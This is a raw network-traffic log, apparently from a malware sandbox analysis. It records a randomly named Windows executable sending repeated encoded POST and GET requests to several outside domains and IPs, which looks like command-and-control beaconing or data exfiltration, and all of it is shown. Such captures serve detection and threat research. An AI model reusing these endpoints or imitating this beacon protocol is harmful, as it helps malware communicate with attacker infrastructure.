                                                    12 | 192.168.2.8 | 49725 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:36.438674927 CEST | 357 | OUT | GET /v1kj/?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.sponsoraveteran.info
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:36.905607939 CEST | 404 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:45:36 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.8 | 49727 | 38.47.232.185 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:42.295532942 CEST | 599 | OUT | POST /e5ni/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yvw66.top
                                                    Origin: http://www.yvw66.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.yvw66.top/e5ni/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=0gI2W+l4NUBqKdagoALm8G+iN2V9EnrGqKdaYzn84YiNYQLEBC94QovKmsXJfOsgpVSHS8i7vmBuTbf3FvZTFq4wWX0sW0uEOxJDFHcnx4qIaE0fZdl2II9ZcOM9ooiBPhA2e+QLyINRPgBdnUSuCVBm9EDiGotets4qYo+TnTEvbfn4Gn7lGt60GtjC6VKFNkijGhc=
                                                    Jul 1, 2024 15:45:43.212255001 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:43 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.8 | 49728 | 38.47.232.185 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:44.838224888 CEST | 619 | OUT | POST /e5ni/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yvw66.top
                                                    Origin: http://www.yvw66.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.yvw66.top/e5ni/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=0gI2W+l4NUBqL5egqjTm6m+hQGV9NHrCqKZaYyTs5u6NYyTEAGp4RovKycXGB+tNpVf6S+27vmVuTZH3CdxUGa4ya30iYUuEOxJDFHgJx4iIb3sfZ/N5X49ebOM9soiFPhAUe8khyOBRPhxd2m6hJVAviUCXH68XoL4Td5L8pzcaTJKScFzjFtSfGuL0/iXtXHyTY2JHw7zfAIl1R3XbPOdMeta+
                                                    Jul 1, 2024 15:45:45.833457947 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:45 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.8 | 49729 | 38.47.232.185 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:47.376334906 CEST | 1636 | OUT | POST /e5ni/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yvw66.top
                                                    Origin: http://www.yvw66.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.yvw66.top/e5ni/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:48.313740015 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:48 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.8 | 49730 | 38.47.232.185 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:49.913324118 CEST | 346 | OUT | GET /e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.yvw66.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:50.833156109 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:50 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.8 | 49731 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:55.906254053 CEST | 638 | OUT | POST /vapn/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.fundraiserstuffies.com
                                                    Origin: http://www.fundraiserstuffies.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.fundraiserstuffies.com/vapn/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=+K4iu8LOoMWmJHcf1VDlYNDGRd+KQy9Aao2D0poGwnttuseaUQQAsXCaHhURM0T5JrB31SsJPV1pIPCcD38lCVWdZ8dTq4Mmd+ZTkPtvlklekemC0LRbQXbQS/j8u6+yN8Q8KvUBOk3tZlX+9+eVgVmq5nlXK5eW1bypmOLa5+v7iCfslZOg6mamkL9fKdrrnyPz8rE=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.8 | 49732 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:45:58.443218946 CEST | 658 | OUT | POST /vapn/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.fundraiserstuffies.com
                                                    Origin: http://www.fundraiserstuffies.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.fundraiserstuffies.com/vapn/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=+K4iu8LOoMWmPmsf30DlNdDJe9+KbS9EapKD0ossw0ZtuNuaVS4ArXCaTxUUDUT2Jq8C1Q4JPTZpILGcCAgiQ1WTVcdRu4Mmd+ZTkOJJlgBeltOC2u9ad3bRT/j8la/aN8RTKtxWOnDtZgr+9veWqVmWnXkPZ8HoyaKRs/X+/tWFj0yG/7Gm5myNkIVpPq2D9RfDi8QIBIQTujKwvj/0t1tM9v76


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.8 | 49733 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:00.973404884 CEST | 1675 | OUT | POST /vapn/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.fundraiserstuffies.com
                                                    Origin: http://www.fundraiserstuffies.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.fundraiserstuffies.com/vapn/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.8 | 49734 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:03.504300117 CEST | 359 | OUT | GET /vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.fundraiserstuffies.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:03.969911098 CEST | 404 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:46:03 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.8 | 49735 | 81.88.48.71 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:09.076381922 CEST | 626 | OUT | POST /8lwi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.aquamotricidad.com
                                                    Origin: http://www.aquamotricidad.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.aquamotricidad.com/8lwi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=YTCfjqtRwoGVk5Toel5WkglY/XHevYeg0LxybGBpWl066LmT1Mn/FGffA1J/wBvj/5aUwOj8UIUIgEFvGikv2V+WkQCqKDfJYzng1yUpdNFk5xTHdkY89aNDmsjQhJUbC7UesdewA+H5g15o9AqlTxTQDq2AnvKHGR36Zm85q8x7/vzHwFgQJRNIsDT9Mxv8Y4GOW/I=
                                                    Jul 1, 2024 15:46:09.794313908 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:09 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.8 | 49736 | 81.88.48.71 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:11.750438929 CEST | 646 | OUT | POST /8lwi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.aquamotricidad.com
                                                    Origin: http://www.aquamotricidad.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.aquamotricidad.com/8lwi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=YTCfjqtRwoGVnYDoN05WiAlbw3Hel4ek0LNybGp5WTk66pOTnef/CGffIVJ++hv4/5f3wLb8UIAIgGdvHVws3F+UiQDsVTfJYzng1yQXdNdk5hjHbFY706NMvMjQlJVSC7UgscCWA8v5g0Jo9RqmIhTSP63wus3RJSnbcA0kru4H+ZetqnoWKRljsA7LJGyUCbW+IoetE8WlnlANVW2EeMJ+9RTP
                                                    Jul 1, 2024 15:46:12.421789885 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:12 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.8 | 49737 | 81.88.48.71 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:14.283866882 CEST | 1663 | OUT | POST /8lwi/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.aquamotricidad.com
                                                    Origin: http://www.aquamotricidad.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.aquamotricidad.com/8lwi/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:14.980087996 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:14 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.8 | 49738 | 81.88.48.71 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:16.815717936 CEST | 355 | OUT | GET /8lwi/?hv=VRq/gdJR4rGg5JPfAG5ylFJXonLci7il5oNXQSZCeVYj1ovZxvPBP2fSASRs9V/B8emNhLugTvQrnEJ4A2g8ywXJhi2TGyyLJT3xrxwpBdhnsBD5VEgEmoQil+34l9QVbw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.aquamotricidad.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:17.502912998 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:46:17 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8lwi/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    25 | 192.168.2.8 | 49739 | 38.47.207.94 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:22.568198919 CEST | 599 | OUT | POST /fuua/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.te74y.top
                                                    Origin: http://www.te74y.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.te74y.top/fuua/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=6dlxdexCnKXA2/EsJ/Q7rYQ97agPnXk6oklSNGcDhqUh1rKUYeiL2lFh0jdB3J0cyr04ypm+GFcOsXUaX1VC494F/3OyGNYiPKMEB9ccIDwAFWZHAqYw7TFcGQMwgL+4D6bRqjv3puuB9IWJp4VXewXaaWwyHd9YdvMkDhTcC1WvGReqAel4GPEXuGFpBWqUq5IQ/FA=
                                                    Jul 1, 2024 15:46:23.513964891 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.8 | 49740 | 38.47.207.94 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:25.104338884 CEST | 619 | OUT | POST /fuua/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.te74y.top
                                                    Origin: http://www.te74y.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.te74y.top/fuua/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=6dlxdexCnKXA3eUsOfs78oQ+06gPynk+okpSND8thYAh2OOUZfiL1lFhsTdEzJ0Dyrowyry+GFYOsSoaXmNN+94H3XO8CNYiPKMEB9Y2IDoAFlBHCLY3njFfRgMwkL+kD6bjqgrOpoiB9NSJpthQHAWRFmxfDMYTVMwRPA/CMU6UHnzAa8t+FPs8uFtfEh38waYghSXHzPpqA+pnMqvVe/E+cQ7h
                                                    Jul 1, 2024 15:46:26.002897024 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.8 | 49741 | 38.47.207.94 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:27.648333073 CEST | 1636 | OUT | POST /fuua/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.te74y.top
                                                    Origin: http://www.te74y.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.te74y.top/fuua/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=6dlxdexCnKXA3eUsOfs78oQ+06gPynk+okpSND8thY4h14yUY8KL0lFhhzdFzJ1Zyrg0yrOUGHQO+gwaAnNNrN4H73OxGNZ2PJ0IB8o2IDoAFkxHGaY30zFcGQN/gL+YD7zJqjHeoYCB9tiJrbNQOAWTGmxHDMkcVIYVPA7kMXqUKyO2FfBfRJ88pXdzCiXB+Mk6hlr114pgX915DKzYLLYVRV+UwsY109fbmwhWcW0tyCURl5X5gsMok3gO4fWwyIFrKv+Miyr6qgMtdvp2yq6KUgqnpQmD5bWQP226poHssAkQqu+g22U7I6Df5/euHSu61rWFfyCHdh2NV61lOGokSRRDPSUnmualQhZ8p3yCA9CDOUbV7pijIgBSmtCkrjWs0l7mlDGpeSa9cpUs+UHNko4o3r4pdBvQ0i0XurhqdPz7vTllkQHr1LyRj2JB33UQmKPWT2aLGZ2rbCn07LGZZotIFc969OdMdCgOoEWm+12MN5ftICxsdEtHQ8YQpVPaI9BnTQ2/pFexR4Tdf69h+HE1LoQR+5MbliviH6RKD2NqOA2g9LY0IuE7AciViNM9PW03Az5FAkFUhhtcHAQqm43sf5plHog6gpgVZNzwCY58mvpyT5tnukdKDGHBQ17s3cjtwh2ktmwkz21Ne6noLcl05kaogs+TKlLeDifgJL5Fq3MeW/2ihFjADGjzc2DUaNrBx3aAgoDxgx83Ol3gOdxmmU4JguSzsNrO8jIX3AEVixcr/iOTdoscYJf3+mNwXCb7dYps0WxHWj5woKgJnt7A9zp6NlDiVFi1M7l5A+8PJ/QzRdK/K5DppzuFrAG1xl9pI79EupnhhRp+F1xDF6L20sZbFrG21l4WuZGxsfDN035Ksi175rxSgWIbbNcqqq1rXymKqlAQL1R91e4sYzNGJoukuStZ46EOJO+OxpJbbsw3GlZbBd5VAfRgrpXjagWaYHTWzx8HeYpAZje9oEKhTKIxk1gmMgm0Vgh7/38Pm [TRUNCATED]
                                                    Jul 1, 2024 15:46:28.541544914 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.8 | 49742 | 38.47.207.94 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:30.174475908 CEST | 346 | OUT | GET /fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.te74y.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:31.108263969 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:46:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.8 | 49743 | 35.241.41.54 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:36.503489017 CEST | 602 | OUT | POST /44zl/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ngkwnq.xyz
                                                    Origin: http://www.ngkwnq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.ngkwnq.xyz/44zl/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=RRfGBXjMk0r28CoACSx4b+1PqoFzRy/mOOeqb+oMm4mOPJPlZkVgVlvfwatTsL01ZP0TyrGdhNZd7L60XdXi8keKcxhbQvFC7cI4Uruy51qq7qhtXDpyapE737VUbw2DwcArdqEmoxM9UJIIO0EvhUbhcn7SkLQjlsDi7z+rPEyiQbgKreDlLyU5zNg1GQIOlKVGRLI=
                                                    Jul 1, 2024 15:46:37.154994965 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:37.158318043 CEST | 157 | IN
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


